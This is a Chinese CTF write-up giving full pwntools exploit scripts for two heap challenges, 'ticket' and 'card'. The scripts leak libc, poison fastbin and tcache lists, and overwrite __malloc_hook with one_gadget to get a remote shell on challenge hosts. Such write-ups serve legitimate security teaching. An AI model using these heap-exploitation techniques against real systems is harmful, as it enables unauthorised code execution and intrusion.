Niyah

DASCTFxBuuctf五月大联动

还得加油

# ticket

libc-2.23 下的题目,漏洞点在于只要某个位置 + 6 的地方有值,就可以 free 该位置,之后将那个位置 + 6 位置清 0

  1. 将输入信息的堆块申请两次,之后 free 掉 name 和(-2 和 - 1)再显示信息就可以泄露堆地址
  2. 利用 unsortedbin 切割后输出泄露出 libc 地址
  3. 既然我们有堆地址,那么我们可以在 age 处伪造一个指针,这个指针指向一个堆块,那么加上之前申请的一个指针就有两个指针指向了同一个堆块,强行 UAF
  4. 利用 realloc 调节栈帧再使用 one_gadget getshell
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
# Echo every byte on the wire; indispensable while tuning heap offsets.
context.log_level = 'debug'

# Target binary plus the libc the remote instance runs (offsets below are for 2.23).
binary = 'ticket'
elf, libc = ELF(binary), ELF("./libc-2.23.so")
context.binary = binary

# DEBUG=1 runs the binary locally, otherwise connect to the challenge instance.
DEBUG = 0

if not DEBUG:
  host = "node3.buuoj.cn"
  port = 29266
  p = remote(host, port)
else:
  # For a foreign-arch target wrap the binary in qemu-user here, e.g.
  # process(["qemu-aarch64", "-L", "<sysroot>", binary]) (add "-g", "1234" to wait for gdb).
  p = process(binary)

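def as_bytes(value):
  """Coerce a prompt or answer to bytes.

  The original helpers wrapped every argument in str(). That is harmless on
  Python 2 (str *is* bytes) but on Python 3 str(b"x") yields "b'x'", which
  silently corrupts p64() payloads sent through sla()/sa()/ru(). Bytes pass
  through untouched; anything else (ints, text prompts) is rendered with
  str() and ASCII-encoded, so behaviour on Python 2 is unchanged.
  """
  if isinstance(value, bytes):
    return value
  return str(value).encode()

def l64():
  """Leak a 64-bit pointer: read up to the first 0x7f byte, take the last 6 bytes, zero-extend.

  Assumes the leaked address ends in 0x7f (typical for libc mappings); if the
  high byte differs, recvuntil() blocks instead of returning.
  """
  return u64(p.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))

def l32():
  """Leak a 32-bit pointer terminated by 0xf7 (32-bit libc mappings)."""
  return u32(p.recvuntil(b"\xf7")[-4:].ljust(4, b"\x00"))

def sla(a, b):
  """Wait for prompt *a*, then send *b* followed by a newline."""
  return p.sendlineafter(as_bytes(a), as_bytes(b))

def sa(a, b):
  """Wait for prompt *a*, then send *b* with no trailing newline (exact-size fields)."""
  return p.sendafter(as_bytes(a), as_bytes(b))

def lg(name, data):
  """Log *data* as a labelled hex value."""
  return p.success(name + ": 0x%x" % data)

def se(payload):
  """Send raw *payload* as-is."""
  return p.send(payload)

def rl():
  """Receive whatever is currently available."""
  return p.recv()

def sl(payload):
  """Send *payload* followed by a newline."""
  return p.sendline(payload)

def ru(a):
  """Receive up to and including marker *a*."""
  return p.recvuntil(as_bytes(a))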

def dbg():
  """Attach gdb to the live target and block until the user resumes the script."""
  gdb.attach(p)
  pause()

def cmd(num):
  """Pick menu entry *num* at the ">>" prompt."""
  p.sendlineafter(">>", str(num))

def add(id,size):
  """Menu 1: allocate slot *id* with a malloc(*size*) request."""
  cmd(1)
  for prompt, answer in (("Index:", id), ("size:", size)):
    p.sendlineafter(prompt, str(answer))

def delete(id):
  """Menu 2: free slot *id*.

  Negative indices are accepted by the target and are how the exploit reaches
  the name/age fields that live before the slot table (see the writeup above).
  """
  cmd(2)
  p.sendlineafter("Index:", str(id))

def edit(id,text):
  """Menu 3: overwrite the contents of slot *id* with *text* (sent as a line)."""
  cmd(3)
  for prompt, answer in (("Index:", id), ("remarks:", text)):
    p.sendlineafter(prompt, str(answer))

def show(id):
  """Menu 4: print the contents of slot *id* (used for the leaks)."""
  cmd(4)
  p.sendlineafter("Index:", str(id))

def show_info():
  """Menu 6: dump the personal-info record (name/greeting/age)."""
  p.sendlineafter(">>", "6")

def info(addr):
  """Fill in the personal-info record: two fixed 0x20-byte fields, then *addr* as the age.

  Name and greeting are sent without a newline (exactly 0x20 bytes each); the
  age is sent as a line, which is what lets a raw heap address be smuggled in
  as "age" later on.
  """
  filler = "a" * 0x20
  p.sendafter("Your name:", filler)
  p.sendafter("take off(wu hu qi fei): ", filler)
  p.sendlineafter("Your age: ", str(addr))

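# one_gadget offsets for the libc-2.23 build shipped with the task; only [1] is used.
one_gad = [0x45216, 0x4526a, 0xf02a4, 0xf1147]

# ---- Stage 1: heap leak ---------------------------------------------------
# Fill in the info record twice (menu 5 re-enters it) so the name/greeting
# buffers are heap chunks reachable through the negative delete indices.
info(1)
cmd(5)
info(1)

add(4, 0x100)   # keeps a non-zero value at name+6 so delete(-2) passes the target's "+6 must be set" check
add(5, 0x100)

delete(-2)
delete(-1)

show_info()
p.recvuntil("Saying: ")
# The freed name buffer now starts with a heap pointer (presumably the fastbin
# fd); read it up to the newline.  NOTE: an address containing 0x0a would be
# truncated here — re-run if the leak looks short.
heap_addr = u64(p.recvuntil(b"\x0a")[0:-1].ljust(8, b"\x00"))
lg("leak", heap_addr)

# ---- Stage 2: libc leak ---------------------------------------------------
add(0, 0x28)
add(1, 0x28)

add(2, 0x118)   # 0x120 chunk: beyond fastbin range, so free() puts it in the unsorted bin
add(3, 0x118)   # guard so chunk 2 cannot merge into top
delete(2)
add(2, 0x28)    # carve a small chunk out of the freed 0x120 one; its body still holds arena bin pointers
show(2)

# 360 + 16: distance of the leaked bin-head pointer from __malloc_hook in this
# libc (main_arena+0x168, with main_arena sitting 0x10 past __malloc_hook).
# Re-derive this if the libc build changes.
__malloc_hook = l64() - 360 - 16
lg("__malloc_hook", __malloc_hook)

libc_base = __malloc_hook - libc.sym["__malloc_hook"]
realloc = libc.sym["realloc"] + libc_base
# The original computed one_gad[0] here but then wrote one_gad[1] into the
# payload; bind the gadget that is actually used so the two cannot drift apart.
one_gadget = libc_base + one_gad[1]

lg("realloc", realloc)
lg("libc_base", libc_base)

# ---- Stage 3: forced UAF + fastbin attack on __malloc_hook ---------------
delete(2)
delete(-10)     # purpose not evident from the script alone; presumably clears stale state — confirm under gdb

add(2, 0x60)    # 0x70-size fastbin chunk: the 0x7f byte at __malloc_hook-0x23 passes as its fake size

cmd(5)
info(heap_addr + 0x2b0 + 0x10)   # plant a second pointer to chunk 2 in the age field (offset assumed from the leak — TODO confirm)

delete(-3)      # free through the forged age pointer: chunk 2 is in the fastbin while slot 2 still references it

edit(2, p64(__malloc_hook - 0x23))   # fastbin fd -> fake chunk straddling __realloc_hook/__malloc_hook

delete(0)
delete(1)

add(0, 0x68)    # takes chunk 2 back out of the 0x70 fastbin
add(1, 0x68)    # takes the fake chunk: user data starts at __malloc_hook - 0x13

# 0xb bytes of padding reach __realloc_hook, which receives the one_gadget;
# __malloc_hook receives realloc+6 so realloc's prologue re-shapes the stack
# before the gadget runs (the gadget's constraints are not met otherwise).
payload = b"a" * 0xb + p64(one_gadget) + p64(realloc + 6)

edit(1, payload)

#dbg()

# Trigger: the next malloc() goes __malloc_hook -> realloc+6 -> __realloc_hook -> shell.
delete(-10)
cmd(5)


p.interactive()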

# card

libc-2.27 off-by-one

# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
# Echo every byte on the wire; indispensable while tuning heap offsets.
context.log_level = 'debug'

# Target binary plus the libc the remote instance runs (offsets below are for 2.27).
binary = 'card'
elf, libc = ELF('card'), ELF("libc.so")
context.binary = binary

# DEBUG=1 runs the binary locally, otherwise connect to the challenge instance.
DEBUG = 0

if not DEBUG:
  host = "node3.buuoj.cn"
  port = 25850
  p = remote(host, port)
else:
  # For a foreign-arch target wrap the binary in qemu-user here, e.g.
  # process(["qemu-aarch64", "-L", "<sysroot>", binary]) (add "-g", "1234" to wait for gdb).
  p = process(binary)

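def as_bytes(value):
  """Coerce a prompt or answer to bytes.

  The original helpers wrapped every argument in str(). That is harmless on
  Python 2 (str *is* bytes) but on Python 3 str(b"x") yields "b'x'", which
  silently corrupts p64() payloads sent through sla()/sa()/ru(). Bytes pass
  through untouched; anything else (ints, text prompts) is rendered with
  str() and ASCII-encoded, so behaviour on Python 2 is unchanged.
  """
  if isinstance(value, bytes):
    return value
  return str(value).encode()

def l64():
  """Leak a 64-bit pointer: read up to the first 0x7f byte, take the last 6 bytes, zero-extend.

  Assumes the leaked address ends in 0x7f (typical for libc mappings); if the
  high byte differs, recvuntil() blocks instead of returning.
  """
  return u64(p.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))

def l32():
  """Leak a 32-bit pointer terminated by 0xf7 (32-bit libc mappings)."""
  return u32(p.recvuntil(b"\xf7")[-4:].ljust(4, b"\x00"))

def sla(a, b):
  """Wait for prompt *a*, then send *b* followed by a newline."""
  return p.sendlineafter(as_bytes(a), as_bytes(b))

def sa(a, b):
  """Wait for prompt *a*, then send *b* with no trailing newline (exact-size fields)."""
  return p.sendafter(as_bytes(a), as_bytes(b))

def lg(name, data):
  """Log *data* as a labelled hex value."""
  return p.success(name + ": 0x%x" % data)

def se(payload):
  """Send raw *payload* as-is."""
  return p.send(payload)

def rl():
  """Receive whatever is currently available."""
  return p.recv()

def sl(payload):
  """Send *payload* followed by a newline."""
  return p.sendline(payload)

def ru(a):
  """Receive up to and including marker *a*."""
  return p.recvuntil(as_bytes(a))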

def dbg():
    """Attach gdb to the live target and block until the user resumes the script."""
    gdb.attach(p)
    pause()

def cmd(num):
  """Pick menu entry *num* at the "choice:" prompt."""
  p.sendlineafter("choice:", str(num))

def add(id,size,text):
  """Menu 1: create card *id* with a malloc(*size*) buffer and write *text* into it (as a line)."""
  cmd(1)
  for prompt, answer in (("card:", id), ("power:", size), ("quickly!", text)):
    p.sendlineafter(prompt, str(answer))

def edit(id,text):
  """Menu 2: rewrite card *id*'s buffer with *text* (sent as a line).

  This is the off-by-one primitive: the target lets the edit run one byte
  past the buffer, which the exploit uses to bump the next chunk's size.
  """
  cmd(2)
  for prompt, answer in (("card", id), ("show", text)):
    p.sendlineafter(prompt, str(answer))

def delete(id):
  """Menu 3: free card *id*."""
  cmd(3)
  p.sendlineafter("card:", str(id))

def show(id):
  """Menu 4: print card *id*'s buffer (used for the libc leak)."""
  cmd(4)
  p.sendlineafter(":", str(id))

# one_gadget offsets for the libc-2.27 build shipped with the task; only [2] is used.
one_gadget = [0x4f2c5,0x4f322,0x10a38c]

# Seven 0xa0 cards fill the tcache bin for that size, so the eighth free
# (card 7) goes to the unsorted bin instead; card 8 keeps card 7 off the top chunk.
for i in range(7):
  add(i,0x98,"aaaa")

add(7,0x98,"aaaa")
add(8,0x98,"aaaa")

for i in range(7):
  delete(i)

delete(7)
# Carve three 0x20 cards out of the freed card 7; the first inherits the
# stale arena pointers left in the chunk body.
add(9,0x18,"aaa")
add(10,0x18,"aaa")
add(11,0x18,"aaa")

show(9)
l64()   # first 0x7f-terminated value is presumably the fd mangled by the "aaa\n" written at allocation; discard

# 240 + 16: distance of the leaked bin-head pointer from __malloc_hook in
# this libc (main_arena+0xf0, main_arena sitting 0x10 past __malloc_hook).
# Re-derive this if the libc build changes.
__malloc_hook = l64() - 240 - 16
lg("leak",__malloc_hook)
libc_base = __malloc_hook - libc.sym["__malloc_hook"]

# Off-by-one: 0x19 bytes into a 0x18 buffer, so the last byte lands on
# card 10's size field (0x21 -> 0x41).
edit(9,"\x00"*0x18 + "\x41" )
delete(10)   # freed as a 0x40 chunk (tcache 0x40)

add(10,0x38,"aaa")   # comes back as 0x40: now overlaps card 11's header and body

delete(11)   # card 11 goes to tcache 0x20; its next pointer now lies inside card 10's writable range
# Keep card 11's size sane (0x21) and point its tcache next pointer at __malloc_hook.
payload = p64(0) *3 + p64(0x21) + p64(__malloc_hook)

edit(10,payload)

add(0,0x18,"aaa")                          # pops card 11 from tcache 0x20
add(1,0x18,p64(one_gadget[2]+libc_base))   # next 0x20 malloc returns __malloc_hook; write the gadget into it

# Trigger: the next malloc() runs the hook. Presumably the content prompt
# is never reached because the hooked malloc fires first — hence no "quickly!" answer.
cmd(1)
sla("card:",3)
sla("power:",0x10)

p.interactive()

本作品采用 知识共享署名-非商业性使用-禁止演绎 4.0 国际许可协议 进行许可。